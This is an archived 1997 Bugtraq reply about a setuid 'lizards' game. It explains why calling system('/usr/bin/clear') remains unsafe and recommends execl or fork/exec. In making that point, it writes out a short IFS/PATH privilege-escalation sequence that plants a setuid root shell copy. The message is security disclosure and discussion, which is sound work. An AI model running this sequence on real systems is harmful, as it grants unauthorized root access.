Bugtraq mailing list archives
Re: Vunerability in Lizards game
From: j-zbiciak1 () ti com (Joe Zbiciak)
Date: Tue, 18 Nov 1997 13:02:01 -0600
John Dow said previously: | - but then again, my system("clear") wasn't particularly | elegant either. How about system("/usr/bin/clear")? That won't work. An attack along these lines will slice through that "fix" pretty quickly, if I'm not mistaken. export IFS=/ export PATH=.:$PATH echo "cp /bin/sh ./root_sh; chmod 4755 ./root_sh" > ./usr chmod 755 ./usr lizards :-) "system()" is just not cut out for security. *slightly* better would be to exec /usr/bin/clear directly with a fork/exec. Or, if your exiting the game completely at that point (eg. you have nothing left to do at that point), just do an execl("/usr/bin/clear","clear",0); and be done with it. Regards, --Joe -- +------------ Joseph Zbiciak -----------+ |- - - - - j-zbiciak1 () ti com - - - - -| You have the capacity to | - http://www.primenet.com/~im14u2c/ - | learn from mistakes. |- - - -Texas Instruments, Dallas- - - -| You will learn alot today. +------#include <std_disclaimer.h>------+
Current thread:
- Re: Intel Pentium Bug, (continued)
- Re: Intel Pentium Bug Aleph One (Nov 08)
- Microsoft Office security bug Aleph One (Nov 07)
- Re: Microsoft Office security bug Inigo Gonzalez (Nov 11)
- What were the opcodes to hang a Pentium again? (fwd) Darren Reed (Nov 11)
- Re: Microsoft Office security bug Aleph One (Nov 11)
- Vunerability in Lizards game SUID (Nov 11)
- Re: Vunerability in Lizards game Alex Murray (Nov 12)
- Re: Vunerability in Lizards game Olaf Titz (Nov 13)
- Re: Vunerability in Lizards game Kragen \ (Nov 13)
- Re: Vunerability in Lizards game Neil Levine (Nov 17)
- Re: Vunerability in Lizards game Joe Zbiciak (Nov 18)
- Re: Vunerability in Lizards game Zoltan Hidvegi (Nov 18)
- Major Security Flaw in Cybercash 2.1.2 Kerri Kraft (Nov 19)
- IP DOS attacks -- Win95 and WinNT Paul Leach (Nov 18)
- Microsoft Office security bug Aleph One (Nov 07)
- Re: Intel Pentium Bug Aleph One (Nov 08)
- Updating microcode on the fly Superuser (Nov 12)
- Re: Updating microcode on the fly Jyri Kaljundi (Nov 12)
- solaris 251 & syslogd Michael Helm (Nov 12)
- Re: solaris 251 & syslogd Richard Peters (Nov 12)
- Re: solaris 251 & syslogd Dave Kinchlea (Nov 12)
- CERT Advisory CA-97.25 - REVISED- Code Correction Aleph One (Nov 12)
- Bug In Security Dynamics' FTP server (Version 2.2) sp00n (Nov 12)